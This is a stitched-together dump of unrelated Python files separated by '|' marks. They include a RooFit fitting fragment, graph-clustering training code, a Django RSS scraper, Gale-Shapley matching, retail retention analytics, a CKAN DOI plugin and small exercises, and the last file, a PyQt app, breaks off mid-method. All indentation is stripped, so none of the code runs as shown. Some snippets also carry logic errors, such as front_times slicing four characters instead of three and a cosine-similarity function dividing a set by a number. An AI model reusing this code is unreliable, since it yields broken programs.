out_f = TFile ("results_data_fits_%s_newSigmaFRT_Jpsi.root"%args.year,"RECREATE")
out_w = ROOT.RooWorkspace("data_w")
for ibin in range(len(q2binning)-1):
print 'dimuon selection: ', args.dimusel
if args.dimusel == 'rejectPsi' and \
(q2binning[ibin] == 8.68 or q2binning[ibin] == 12.86):
continue
if q2binning[ibin] < 8: continue
if q2binning[ibin] > 10: continue
fitData(fulldata, ibin, w)
print ' --------------------------------------------------------------------------------------------------- '
print '--------------------------------------------------------------------------------------------------- '
print 'bin\t\t fit status \t cov. matrix \t\t chi2'
for i,k in enumerate(fitStats.keys()):
if i%3==0: print '------------------------------------------------------'
print k , '\t\t', fitStats[k], '\t\t', covStats[k], '\t\t', chi2s[k]
out_f.Close()
out_w.writeToFile(out_f.GetName(), False)
|
from array import *
import Recursion as aa
arr = array('i',[])
n = int(input("Enter no. of array elements: "))
for i in range(n):
val = int(input("Enter No.:"))
arr.append(val)
print(arr)
idx = 0
v = int(input("Enter the value you want to search: "))
for k in arr:
if k == v:
print("Index=",idx)
break
idx += 1
else:
print("not found")
#print(arr.index(v)) #will show error if v is not found in the arrayV
import numpy as np
arr1 = np.array([[22,34],[23,43]])
print(arr1)
print(aa.fact(3)) |
import json
sampleJson = """{
"company":{
"employee":{
"name":"emma",
"payble":{
"salary":7000,
"bonus":800
}
}
}
}"""
sample = json.loads(sampleJson)
print(sample['company']['employee']['payble']['salary'])
# 2
with open('file.json', 'w') as f:
sampleJson = {"id" : 1, "name" : "value2", "age" : 29}
json.dump(sampleJson, f, indent=2, sort_keys=True)
|
import os
import math
import random
from scipy.sparse import csr_matrix
import scipy.sparse as sp
import networkx as nx
import pandas as pd
import numpy as np
import tensorflow as tf
tf.config.experimental.set_visible_devices([], 'GPU')
from sklearn import metrics
from constants import LR, l, gamma, eta, beta, DATASET_NAME, DROPOUT, epochs, CONV1_OUT_SIZE
from utils import load_data
from metrics import clustering_metrics
from model import MyModel
from losses import total_loss
def convert_sparse_matrix_to_sparse_tensor(sparse_mx):
if not sp.isspmatrix_coo(sparse_mx):
sparse_mx = sparse_mx.tocoo()
# get the indices of the non zero values in the matrix
indices_matrix = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()
# get the non zero values of the matrix
values = sparse_mx.data
#get the shape
shape = sparse_mx.shape
# create a sparse tensor
sparse_tensor = tf.SparseTensor(indices=indices_matrix, values=values, dense_shape=shape)
return tf.cast(sparse_tensor, dtype=tf.float32)
# features is the sparse matrix containing the features
# adj_train is the sparse adjiacency matrix
# adj_train_norm = D^{-1/2}(A+I)D^{-1/2}
# train_edges, train_false_edges are edges that are not present in the adj_matrix
# clustering_labels -> labels of the nodes
# optimizer: the optimizer to apply
# F is the diagonal matrix s.t. F_ii = sum_j S_ij
# S = lambda*normalized(Stopo) + (1-lambda)normalized(S att)
# gamma : defines how to balance att loss and topo loss
# eta defines the imporance of the reg loss
# Y: square matrix st y_ij = beta* (di dj/ 2e) + (1-beta)*(cos_sim(feat_i, feat_j)/ sum_k cos_sim(feat_i, feat_k))
# D is the diagonal matrix s.t. d_ii = deg(i) in (A+I)
# K is the number of clusters
def train(features, adj_train, adj_train_norm, train_edges, train_false_edges, clustering_labels , optimizer, F, S, gamma, eta, Y, D, number_of_features,K):
print("training")
max_acc_x = 0
max_acc_z = 0
# covnert matrices to tensors
adj_train_norm_tensor = convert_sparse_matrix_to_sparse_tensor(adj_train_norm)
Y_tensor = tf.convert_to_tensor(Y, dtype="float32")
D_tensor = tf.convert_to_tensor(D, dtype="float32")
F_tensor = tf.convert_to_tensor(F, dtype="float32")
S_tensor = tf.convert_to_tensor(S, dtype="float32")
feature_tensor = convert_sparse_matrix_to_sparse_tensor(features)
# define the model
model = MyModel(Y_tensor, K, D_tensor, adj_train_norm_tensor, number_of_features)
for i in range(epochs):
with tf.GradientTape() as tape:
pred = model(feature_tensor)
# if you want ot train over the non known edges use this
""" train_edges_p_pred = [pred[0][x[0]*adj_train.shape[0]+x[1]] for x in train_edges]
train_edges_n_pred = [pred[0][x[0]*adj_train.shape[0] +x[1]] for x in train_false_edges]
train_edges_p_l = [1]*len(train_edges_p_pred)
train_edges_n_l = [0]*len(train_edges_n_pred)
pred[0] = train_edges_p_pred + train_edges_n_pred
y_actual = [train_edges_p_l+train_edges_n_l, features.toarray().flatten()]
"""
# define the ground truth
y_actual = [adj_train.toarray().flatten(), features.toarray()]
# get the embedding of the nodes
Z = model.getZ()
Z_np = model.getZ().numpy()
X2 = model.getX2()
X2_np = model.getX2().numpy()
# calculate the loss
loss = total_loss(y_actual, pred, F_tensor, S_tensor, Z, gamma, eta)
# get the gradients
grad = tape.gradient(loss, model.trainable_variables)
# update the weights of the model by using the precendetly calculated gradients
optimizer.apply_gradients(zip(grad, model.trainable_variables))
print("#"*30)
print("epoch:{}, train loss: {}".format(i, loss))
# measure accuracy on the train edges
top_acc_function = tf.keras.metrics.BinaryAccuracy()
top_acc_function.update_state(y_actual[0], pred[0])
top_train_accuracy = top_acc_function.result().numpy()
# measure the accuracy on the attributes
att_acc_function = tf.keras.metrics.BinaryAccuracy()
att_acc_function.update_state(y_actual[1].flatten(), tf.reshape(pred[1], [-1]))
att_train_accuracy = att_acc_function.result().numpy()
print("train top acc: {}".format(top_train_accuracy))
print("train att acc: {}".format(att_train_accuracy))
# get the labels from the embedding layer
pred_labels_z = Z_np.argmax(1)
pred_labels_x = X2_np.argmax(1)
# get the accuracy pf the predicted labels
cm = clustering_metrics(labels, pred_labels_z)
res = cm.clusteringAcc()
print("acc_z:{}, f1_z:{}".format(res[0], res[1]))
if(res[0]>max_acc_z):
max_acc_z = res[0]
cm = clustering_metrics(labels, pred_labels_x)
res = cm.clusteringAcc()
print("acc_x:{}, f1_x:{}".format(res[0], res[1]))
if(res[0]>max_acc_x):
max_acc_x = res[0]
print("max_acc_z:{}".format(max_acc_z))
print("max_acc_x:{}".format(max_acc_x))
# compute D^{-1/2}(A+I)D^{-1/2}
def compute_adj_norm(adj):
adj_I = adj + sp.eye(adj.shape[0])
D = np.sum(adj_I, axis=1)
D_power = sp.diags(np.asarray(np.power(D, -0.5)).reshape(-1))
adj_norm = D_power.dot(adj_I).dot(D_power)
return adj_norm
# sparse matrix to tuple (coords of non zero values, values, shape)
def sparse_to_tuple(sparse_mx):
if not sp.isspmatrix_coo(sparse_mx):
sparse_mx = sparse_mx.tocoo()
coords = np.vstack((sparse_mx.row, sparse_mx.col)).transpose()
values = sparse_mx.data
shape = sparse_mx.shape
return coords, values, shape
# choose uar false edges from the matrix
def get_false_edges(adj, n):
print("getting false edges")
false_edges = []
while len(false_edges) < n:
r1 = random.randint(0, adj.shape[0]-1)
r2 = random.randint(0, adj.shape[0]-1)
if(adj[r1, r2] == 0 and r1<r2):
false_edges.append([r1,r2])
return false_edges
# get
# adj_train: triu form of the matrix with removed the train and test edges
# edges -> partition of edges to be used in train and test
def get_test_edges(adj, test_size=0, train_size=0):
print("getting test edges")
adj_ = sp.triu(adj)
coords, _, shape = sparse_to_tuple(adj_)
all_edges = coords
# get the number of train and test edges
num_train = int(train_size*all_edges.shape[0])
num_test = int(test_size*all_edges.shape[0])
# shuffle the edges
np.random.shuffle(all_edges)
# get the test edges(positive)
test_edges = all_edges[:num_test]
# get the train edges(positive)
train_edges = all_edges[num_test:num_test+num_train]
# get the remaning edges(positive)
res_edges = all_edges[num_test+num_train:]
# generate false edges for train and test
false_edges = get_false_edges(adj, test_edges.shape[0]+train_edges.shape[0])
test_false_edges = false_edges[:test_edges.shape[0]]
train_false_edges = false_edges[test_edges.shape[0]:]
print("got false edges")
# create the sparse matrix from the remaning edges
adj_train = sp.csr_matrix((np.ones(res_edges.shape[0]), (res_edges[:, 0], res_edges[:, 1])), shape=adj.shape)
return adj_train, train_edges, np.array(train_false_edges), test_edges, np.array(test_false_edges)
def cosine_similarity_graph(a,b):
# the values are or 0 or 1
den = math.sqrt(len(a)) * math.sqrt(len(b))
num = set(a.keys()).intersection(set(b.keys()))
return num / den
def cosine_similarity(a,b):
# the values are or 0 or 1
den = math.sqrt(a.sum()) * math.sqrt(b.sum())
num = np.dot(a, b)
if(den == 0):
return 0
return num / den
# get the Stopo needed to calculate S
# Stopo: s_ij = cos_sim(neigh_i, neigh_j)
def get_S_topo(adj):
if(os.path.exists('{}_stopo.csv'.format(DATASET_NAME))):
return np.loadtxt('{}_stopo.csv'.format(DATASET_NAME), delimiter=',')
print("getting S topo")
s_topo = np.zeros(adj.shape)
for i in range(adj.shape[0]):
for j in range(i, adj.shape[0]):
cs = cosine_similarity(adj.getrow(i).toarray()[0], adj.getrow(j).toarray()[0])
s_topo[i][j] = cs
s_topo[j][i] = cs
np.savetxt('{}_stopo.csv'.format(DATASET_NAME), s_topo, delimiter=',')
return s_topo
# get the Satt needed to calculate S
# Satt: s_ij = cos_sim(att_i, att_j)
def get_S_att(features_sparse):
if(os.path.exists('{}_satt.csv'.format(DATASET_NAME))):
return np.loadtxt('{}_satt.csv'.format(DATASET_NAME), delimiter=',')
print("getting S att")
s_att = np.zeros((features_sparse.shape[0], features_sparse.shape[0]))
for i in range(features_sparse.shape[0]):
for j in range(i, features_sparse.shape[0]):
cs = cosine_similarity(features_sparse.getrow(i).toarray()[0], features_sparse.getrow(j).toarray()[0])
s_att[i][j] = cs
s_att[j][i] = cs
np.savetxt('{}_satt.csv'.format(DATASET_NAME), s_att, delimiter=',')
return s_att
def min_max_normalizer(m):
print("normalizing")
max_ = m.max()
min_ = m.min()
m = m-min_
return m/(max_-min_)
# lambda*normalized(Stopo) + (1-lambda)normalized(S att)
def getS(adj_train, features, l):
if(os.path.exists('{}_s.csv'.format(DATASET_NAME))):
return np.loadtxt('{}_s.csv'.format(DATASET_NAME), delimiter=',')
print("getting S")
s_topo = min_max_normalizer(get_S_topo(adj_train))
print("got S topo")
s_att = min_max_normalizer(get_S_att(features))
print("got S att")
S = l*s_topo + (1-l)*s_att
np.savetxt('{}_s.csv'.format(DATASET_NAME), S, delimiter=',')
return S
# the diagonal matrix st f_ii = sum_j S_ij
def getF(S):
values = []
for row in S:
values.append(row.sum())
return np.diag(values)
# degree matrix
def getD(adj_train):
values = []
for row in adj_train.toarray():
# +1 since D is the degree matrix of (A+I)
values.append(row.sum()+1)
return np.diag(values)
# Y: square matrix st y_ij = beta* (di dj/ 2e) + (1-beta)*(cos_sim(feat_i, feat_j)/ sum_k cos_sim(feat_i, feat_k))
def getY(adj_train, beta, features_sparse):
if(os.path.exists('{}_Y.csv'.format(DATASET_NAME))):
return np.loadtxt('{}_Y.csv'.format(DATASET_NAME), delimiter=',')
G = nx.Graph(sp.triu(adj_train))
e = G.number_of_edges()
S_att = get_S_att(features_sparse)
Y = np.zeros((adj_train.shape[0], adj_train.shape[0]))
for i in range(adj_train.shape[0]):
for j in range(adj_train.shape[0]):
di = len(G[i])
dj = len(G[j])
aij = 0
if(G.has_edge(i,j)):
aij = 1
eps_ij = di*dj/(2*e) - aij
z_ij = S_att[i][j]
sum_z_i = S_att[i].sum()
Y[i][j] = beta*eps_ij + (1-beta)*z_ij/sum_z_i
np.savetxt('{}_Y.csv'.format(DATASET_NAME), Y, delimiter=',')
return Y
if __name__ == "__main__":
# define the optimizer
optimizer = tf.keras.optimizers.Adam(learning_rate=LR)
#load data
data = load_data(DATASET_NAME)
complete_adj = data[0]
features = data[1]
labels = [x[1] for x in data[2]]
n_clusters = data[3]
# get train data
adj_train_triu, train_edges, train_false_edges, test_edges, test_false_edges = get_test_edges(complete_adj)
print("got adj_train")
# the adj returned by get_test_edges is only triu, we need the complete one
adj_train = adj_train_triu + adj_train_triu.T
# normalize the adj
adj_train_norm = compute_adj_norm(adj_train)
print("normalized the adj matrix")
S = getS(adj_train, features, l)
print("got S")
F = getF(S)
print("got F")
Y = getY(adj_train, beta, features)
print("got Y")
# this method needs to have the complete adj_train (not only the triu)
D = getD(adj_train)
print("got D")
number_of_features = features.shape[1]
train(features, adj_train, adj_train_norm, train_edges, train_false_edges, labels, optimizer, F, S, gamma, eta, Y, D, number_of_features, K=n_clusters)
|
import feedparser
import re
import dateutil.parser
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from news.models import News
class Command(BaseCommand):
def handle(self, *args, **options):
google_trends_rss = feedparser.parse("https://trends.google.com/trends/trendingsearches/daily/rss?geo=US")
cnn_news_rss = feedparser.parse("http://rss.cnn.com/rss/edition_us.rss")
# for trend in google_trends_rss['entries']:
# for news in cnn_news_rss['entries']:
# if re.sub('!@#$,.', '',trend['title'].lower()) in re.sub('!@#$,.', '',news['title'].lower()):
# n_title = news['title']
# n_link = news['link']
# n_trend = trend['title']
# try:
# n_pub_date = dateutil.parser.parse(news.published)
# except AttributeError:
# n_pub_date = None
# n, created = News.objects.get_or_create(
# title = n_title,
# pub_date = n_pub_date,
# link = n_link,
# trend = n_trend
# )
'''to get more results just comment loop upper and uncomment this code'''
for trend in google_trends_rss['entries']:
for news in cnn_news_rss['entries']:
for word in re.sub('!@#$,.', '',trend['title'].lower()).split(' '):
if word in re.sub('!@#$,.', '',news['title'].lower()):
n_title = news['title']
n_link = news['link']
n_trend = trend['title']
try:
n_pub_date = dateutil.parser.parse(news.published)
except AttributeError:
n_pub_date = None
n, created = News.objects.get_or_create(
title = n_title,
pub_date = n_pub_date,
link = n_link,
trend = n_trend
)
return('News are renewed') |
class Solution:
# @param strs, a list of strings
# @return a list of strings
def anagrams(self, strs):
d = dict()
result = list()
for st in strs:
sorted_st = ''.join(sorted(st))
if not sorted_st in d:
d[sorted_st] = st
else: #already find one before
#add the first one in result
if d[sorted_st] != ',':
result.append(d[sorted_st])
d[sorted_st] = ','
result.append(st)
return result
if __name__ == '__main__':
import pdb
strs = ['xian','naxi','hello','world','dlrowd','orwld']
res = Solution().anagrams(strs)
print "res:",res
|
import argparse
import copy
from typing import Final
import pandas as pd
import yaml
from tabulate import tabulate
parser = argparse.ArgumentParser(description='Implementation of the Gale-Shapley algorithm')
parser.add_argument('-s', action='store', dest='scenario', help='The scenario to be ran as specified in '
'config.yaml')
def print_matching(pairs):
hospitals = set([pair[1][0] for pair in pairs.items()])
df = {}
for value in hospitals:
df[value] = [k for k, v in pairs.items() if v[0] == value]
print(tabulate(pd.DataFrame.from_dict(df, orient='index').T.fillna("-"), headers='keys', tablefmt='psql'))
class GaleShapley:
PARAMETERS: Final = yaml.load(open('config.yaml'),
Loader=yaml.FullLoader)
def __init__(self, scenario):
self._parameters = GaleShapley.PARAMETERS[scenario]
self._hospitals = self._parameters['hospitals']
self._residents = self._parameters['residents']
self._rankings = {name: {k: v for v, k in enumerate(preferences)} for name, preferences in
self._residents.items()}
def __call__(self, *args, **kwargs):
return self.apply()
def find_matching(self):
pairs = {}
hospitals_remaining = copy.deepcopy(self._hospitals)
while hospitals_remaining:
hospital_name, values = next(iter(hospitals_remaining.items()))
preferences = values['preferences']
if preferences:
resident = preferences.pop(0)
# if resident has not been seen yet
if resident not in pairs:
pairs[resident] = hospital_name, values
values['open_positions'] -= 1
if values['open_positions'] == 0:
hospitals_remaining.pop(hospital_name)
# else check to see if new choice it better
else:
previous_name, previous_values = pairs[resident]
if self._rankings[resident][hospital_name] < self._rankings[resident][previous_name]:
# increment values to reflect free seats
pairs[resident] = hospital_name, values
values['open_positions'] -= 1
if previous_values['open_positions'] == 0:
hospitals_remaining[previous_name] = previous_values
if values['open_positions'] == 0:
hospitals_remaining.pop(hospital_name)
previous_values['open_positions'] += 1
return pairs
if __name__ == '__main__':
args = parser.parse_args()
print_matching(GaleShapley(args.scenario).find_matching())
|
# Monthly Revenue
# import libraries
# from __future__ import division
from datetime import datetime, timedelta
import pandas as pd
# matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import chart_studio as py
import plotly.offline as pyoff
import plotly.graph_objs as go
# initiate visualization library for jupyter notebook
# pyoff.init_notebook_mode()
tx_data = pd.read_csv('OnlineRetail.csv', encoding = 'unicode_escape')
tx_data.head(10)
# Revenue = Active Customer Count * Order Count * Average Revenue per Order
#converting the type of Invoice Date Field from string to datetime.
tx_data['InvoiceDate'] = pd.to_datetime(tx_data['InvoiceDate'])
#creating YearMonth field for the ease of reporting and visualization
tx_data['InvoiceYearMonth'] = tx_data['InvoiceDate'].map(lambda date: 100*date.year + date.month)
#calculate Revenue for each row and create a new dataframe with YearMonth - Revenue columns
tx_data['Revenue'] = tx_data['UnitPrice'] * tx_data['Quantity']
tx_revenue = tx_data.groupby(['InvoiceYearMonth'])['Revenue'].sum().reset_index()
print(tx_revenue)
# visualization
#X and Y axis inputs for Plotly graph. We use Scatter for line graphs
plot_data = [
go.Scatter(
x=tx_revenue['InvoiceYearMonth'],
y=tx_revenue['Revenue'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Montly Revenue'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Revenue Growth Rate
#using pct_change() function to see monthly percentage change
tx_revenue['MonthlyGrowth'] = tx_revenue['Revenue'].pct_change()
#showing first 5 rows
tx_revenue.head()
#visualization - line graph
plot_data = [
go.Scatter(
x=tx_revenue.query("InvoiceYearMonth < 201112")['InvoiceYearMonth'],
y=tx_revenue.query("InvoiceYearMonth < 201112")['MonthlyGrowth'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Montly Growth Rate'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Active Customers and its bar plot
#creating a new dataframe with UK customers only
tx_uk = tx_data.query("Country=='United Kingdom'").reset_index(drop=True)
#creating monthly active customers dataframe by counting unique Customer IDs
tx_monthly_active = tx_uk.groupby('InvoiceYearMonth')['CustomerID'].nunique().reset_index()
#print the dataframe
tx_monthly_active
#plotting the output
plot_data = [
go.Bar(
x=tx_monthly_active['InvoiceYearMonth'],
y=tx_monthly_active['CustomerID'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Monthly Active Customers'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Order Count and its bar plot
#create a new dataframe for no. of order by using quantity field
tx_monthly_sales = tx_uk.groupby('InvoiceYearMonth')['Quantity'].sum().reset_index()
#print the dataframe
tx_monthly_sales
#plot
plot_data = [
go.Bar(
x=tx_monthly_sales['InvoiceYearMonth'],
y=tx_monthly_sales['Quantity'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Monthly Total # of Order'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Average Revenue per Order and its bar plot
# create a new dataframe for average revenue by taking the mean of it
tx_monthly_order_avg = tx_uk.groupby('InvoiceYearMonth')['Revenue'].mean().reset_index()
#print the dataframe
tx_monthly_order_avg
#plot the bar chart
plot_data = [
go.Bar(
x=tx_monthly_order_avg['InvoiceYearMonth'],
y=tx_monthly_order_avg['Revenue'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Monthly Order Average'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# New Customer Ratio (We will be using .min() function to find our first purchase date for each customer and define new customers based on that.)
#create a dataframe contaning CustomerID and first purchase date
tx_min_purchase = tx_uk.groupby('CustomerID').InvoiceDate.min().reset_index()
tx_min_purchase.columns = ['CustomerID','MinPurchaseDate']
tx_min_purchase['MinPurchaseYearMonth'] = tx_min_purchase['MinPurchaseDate'].map(lambda date: 100*date.year + date.month)
#merge first purchase date column to our main dataframe (tx_uk)
tx_uk = pd.merge(tx_uk, tx_min_purchase, on='CustomerID')
tx_uk.head()
#create a column called User Type and assign Existing
#if User's First Purchase Year Month before the selected Invoice Year Month
tx_uk['UserType'] = 'New'
tx_uk.loc[tx_uk['InvoiceYearMonth']>tx_uk['MinPurchaseYearMonth'],'UserType'] = 'Existing'
#calculate the Revenue per month for each user type
tx_user_type_revenue = tx_uk.groupby(['InvoiceYearMonth','UserType'])['Revenue'].sum().reset_index()
#filtering the dates and plot the result
tx_user_type_revenue = tx_user_type_revenue.query("InvoiceYearMonth != 201012 and InvoiceYearMonth != 201112")
plot_data = [
go.Scatter(
x=tx_user_type_revenue.query("UserType == 'Existing'")['InvoiceYearMonth'],
y=tx_user_type_revenue.query("UserType == 'Existing'")['Revenue'],
name = 'Existing'
),
go.Scatter(
x=tx_user_type_revenue.query("UserType == 'New'")['InvoiceYearMonth'],
y=tx_user_type_revenue.query("UserType == 'New'")['Revenue'],
name = 'New'
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='New vs Existing'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# looking at the New Customer Ratio
#create a dataframe that shows new user ratio - we also need to drop NA values (first month new user ratio is 0)
tx_user_ratio = tx_uk.query("UserType == 'New'").groupby(['InvoiceYearMonth'])['CustomerID'].nunique()/tx_uk.query("UserType == 'Existing'").groupby(['InvoiceYearMonth'])['CustomerID'].nunique()
tx_user_ratio = tx_user_ratio.reset_index()
tx_user_ratio = tx_user_ratio.dropna()
#print the dafaframe
tx_user_ratio
#plot the result
plot_data = [
go.Bar(
x=tx_user_ratio.query("InvoiceYearMonth>201101 and InvoiceYearMonth<201112")['InvoiceYearMonth'],
y=tx_user_ratio.query("InvoiceYearMonth>201101 and InvoiceYearMonth<201112")['CustomerID'],
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='New Customer Ratio'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Retention Rate
# Monthly Retention Rate = Retained Customers From Prev. Month/Active Customers Total (We will be using crosstab() function of pandas which makes calculating Retention Rate super easy.)
# identify which users are active by looking at their revenue per month
tx_user_purchase = tx_uk.groupby(['CustomerID', 'InvoiceYearMonth'])['Revenue'].sum().reset_index()
# create retention matrix with crosstab
tx_retention = pd.crosstab(tx_user_purchase['CustomerID'], tx_user_purchase['InvoiceYearMonth']).reset_index()
tx_retention.head()
# create an array of dictionary which keeps Retained & Total User count for each month
months = tx_retention.columns[2:]
retention_array = []
for i in range(len(months) - 1):
retention_data = {}
selected_month = months[i + 1]
prev_month = months[i]
retention_data['InvoiceYearMonth'] = int(selected_month)
retention_data['TotalUserCount'] = tx_retention[selected_month].sum()
retention_data['RetainedUserCount'] = \
tx_retention[(tx_retention[selected_month] > 0) & (tx_retention[prev_month] > 0)][selected_month].sum()
retention_array.append(retention_data)
# convert the array to dataframe and calculate Retention Rate
tx_retention = pd.DataFrame(retention_array)
tx_retention['RetentionRate'] = tx_retention['RetainedUserCount'] / tx_retention['TotalUserCount']
# plot the retention rate graph
plot_data = [
go.Scatter(
x=tx_retention.query("InvoiceYearMonth<201112")['InvoiceYearMonth'],
y=tx_retention.query("InvoiceYearMonth<201112")['RetentionRate'],
name="organic"
)
]
plot_layout = go.Layout(
xaxis={"type": "category"},
title='Monthly Retention Rate'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Cohort Based Retention Rate
# create our retention table again with crosstab() and add firs purchase year month view
tx_retention = pd.crosstab(tx_user_purchase['CustomerID'], tx_user_purchase['InvoiceYearMonth']).reset_index()
tx_retention = pd.merge(tx_retention, tx_min_purchase[['CustomerID', 'MinPurchaseYearMonth']], on='CustomerID')
new_column_names = ['m_' + str(column) for column in tx_retention.columns[:-1]]
new_column_names.append('MinPurchaseYearMonth')
tx_retention.columns = new_column_names
# create the array of Retained users for each cohort monthly
retention_array = []
for i in range(len(months)):
retention_data = {}
selected_month = months[i]
prev_months = months[:i]
next_months = months[i + 1:]
for prev_month in prev_months:
retention_data[prev_month] = np.nan
total_user_count = tx_retention[tx_retention.MinPurchaseYearMonth == selected_month].MinPurchaseYearMonth.count()
retention_data['TotalUserCount'] = total_user_count
retention_data[selected_month] = 1
query = "MinPurchaseYearMonth == {}".format(selected_month)
for next_month in next_months:
new_query = query + " and {} > 0".format(str('m_' + str(next_month)))
retention_data[next_month] = np.round(
tx_retention.query(new_query)['m_' + str(next_month)].sum() / total_user_count, 2)
retention_array.append(retention_data)
tx_retention = pd.DataFrame(retention_array)
tx_retention.index = months
# showing new cohort based retention table
tx_retention
|
# 在位于屏幕中央且宽度合适的方框内打印一个句子
sentence = input("Please input Sentence: ")
screen_width = 150
text_length = len(sentence)
box_width = text_length + 6
left_margin = (screen_width - box_width) // 2
print()
print(' ' * left_margin + '+' + '-' * (box_width-4) + '+')
print(' ' * left_margin + '| ' + ' ' * text_length + ' |')
print(' ' * left_margin + '| ' + sentence + ' |')
print(' ' * left_margin + '| ' + ' ' * text_length + ' |')
print(' ' * left_margin + '+' + '-' * (box_width-4) + '+')
print() |
"""
CKAN DOI Plugin
"""
from pylons import config
from datetime import datetime
from logging import getLogger
import ckan.plugins as p
import ckan.logic as logic
from ckan.lib import helpers as h
from ckan import model
from ckanext.doi.model import doi as doi_model
from ckanext.doi.lib import get_doi, publish_doi, update_doi, create_unique_identifier, get_site_url, build_metadata, validate_metadata, record_existing_unique_identifier, check_existing_doi
from ckanext.doi.helpers import package_get_year, now, get_site_title
get_action = logic.get_action
log = getLogger(__name__)
class DOIPlugin(p.SingletonPlugin, p.toolkit.DefaultDatasetForm):
"""
CKAN DOI Extension
"""
p.implements(p.IConfigurable)
p.implements(p.IConfigurer)
p.implements(p.IPackageController, inherit=True)
p.implements(p.ITemplateHelpers, inherit=True)
p.implements(p.IValidators)
def get_validators(self):
return {
'doi': check_existing_doi
}
# IConfigurable
def configure(self, config):
"""
Called at the end of CKAN setup.
Create DOI table
"""
if model.package_table.exists():
doi_model.doi_table.create(checkfirst=True)
# IConfigurer
def update_config(self, config):
# Add templates
p.toolkit.add_template_directory(config, 'theme/templates')
# IPackageController
def after_create(self, context, pkg_dict):
"""
A new dataset has been created, so we need to create a new DOI
NB: This is called after creation of a dataset, and before resources have been added so state = draft
@param context:
@param pkg_dict:
@return:
"""
# Only create a new DOI if the user has requested it
if "dataset_category" in pkg_dict:
# Load the local DOI
doi = get_doi(pkg_dict['id'])
# There is a chance that a doi has already been created for this pkg_id
# and could cause an integrity error if another is added
if not doi:
# Create a new doi
create_unique_identifier(pkg_dict['id'])
# Remove the auto create field from the dataset pkg
pkg_dict.pop('dataset_category')
return pkg_dict
# IPackageController
def after_update(self, context, pkg_dict):
"""
Dataset has been created / updated
Check status of the dataset to determine if we should publish DOI to datacite network
@param pkg_dict:
@return: pkg_dict
"""
package_id = pkg_dict['id']
# Load the original package, so we can determine if user has changed any fields
orig_pkg_dict = get_action('package_show')(context, {
'id': package_id
})
# Metadata created isn't populated in pkg_dict - so copy from the original
pkg_dict['metadata_created'] = orig_pkg_dict['metadata_created']
# Load the local DOI
doi = get_doi(package_id)
# Auto create overwrites anything in identifier
# a DOI or identifier might already exist and in this case that DOI will be used
if not doi:
if 'doi_auto_create' in pkg_dict:
# Overwrite any existing identifier with a newly minted DOI
create_unique_identifier(package_id)
# Remove the auto create field from the dataset pkg
pkg_dict.pop('doi_auto_create')
else:
return pkg_dict
# TODO: Handle manual input again
# Is this active and public? If so we need to make sure we have an active DOI
if pkg_dict.get('state', 'active') == 'active' and not pkg_dict.get('private', False):
# Build the metadata dict to pass to DataCite service
metadata_dict = build_metadata(pkg_dict, doi)
# Perform some basic checks against the data - we require at the very least
# title and author fields - they're mandatory in the DataCite Schema
# This will only be an issue if another plugin has removed a mandatory field
validate_metadata(metadata_dict)
# Is this an existing DOI? Update it
if doi.published:
# Before updating, check if any of the metadata has been changed - otherwise
# We end up sending loads of revisions to DataCite for minor edits
# Load the current version
orig_metadata_dict = build_metadata(orig_pkg_dict, doi)
# Check if the two dictionaries are the same
if cmp(orig_metadata_dict, metadata_dict) != 0:
# Not the same, so we want to update the metadata
update_doi(package_id, **metadata_dict)
h.flash_success('DataCite DOI metadata updated')
# TODO: If editing a dataset older than 5 days, create DOI revision
# New DOI - publish to datacite
else:
h.flash_success('DataCite DOI created')
publish_doi(package_id, **metadata_dict)
return pkg_dict
# IPackageController
def after_show(self, context, pkg_dict):
# Load the DOI ready to display
doi = get_doi(pkg_dict['id'])
if doi:
pkg_dict['doi'] = doi.identifier
pkg_dict['doi_status'] = True if doi.published else False
pkg_dict['domain'] = get_site_url().replace('http://', '')
pkg_dict['doi_date_published'] = datetime.strftime(
doi.published, "%Y-%m-%d") if doi.published else None
pkg_dict['doi_publisher'] = config.get("ckanext.doi.publisher")
# ITemplateHelpers
def get_helpers(self):
return {
'package_get_year': package_get_year,
'now': now,
'get_site_title': get_site_title
}
|
# Given a string and a non-negative int n, we'll say that the front of the string is the first 3 chars, or whatever is there if the string is less than length 3. Return n copies of the front;
#
# front_times('Chocolate', 2) → 'ChoCho'
# front_times('Chocolate', 3) → 'ChoChoCho'
# front_times('Abc', 3) → 'AbcAbcAbc'
def front_times(str, n):
for i in range(n):
if len(str) == 3:
print(str * n, end="")
elif len(str) < 3:
print(str * n, end="")
elif len(str) > 3:
print(str[:4] * n, end="")
pop = front_times("abc", 3 ) |
import sys
from PyQt5 import QtWidgets,QtQuick,QtCore,QtGui
from PyQt5.QtWidgets import QMessageBox,QFileDialog
from PIL import Image,ImageQt
import design
from PyQt5.QtGui import QIcon
import os
import cv2
base_style =" cursor:pointer;\
border-style: outset;\
border-width: 2px;\
border-radius: 10px;\
border-color: beige;\
font: bold 14px;\
min-width: 10em;\
padding: 6px;\
max-height: 80px;\
background-color:"
class App(QtWidgets.QMainWindow,design.Ui_MainWindow):
img = None
path = None
#=======================
#Init method and linking buttons to the functions
#=======================
def __init__(self):
super(App, self).__init__()
self.setupUi(self)
self.selectBtn.clicked.connect(self.chooseButtonClick)
self.statBtn.clicked.connect(self.getStat)
self.scanBtn.clicked.connect(self.scanPhoto)
#=========================
#Getting image to scan
#=========================
def getImage(self):
try:
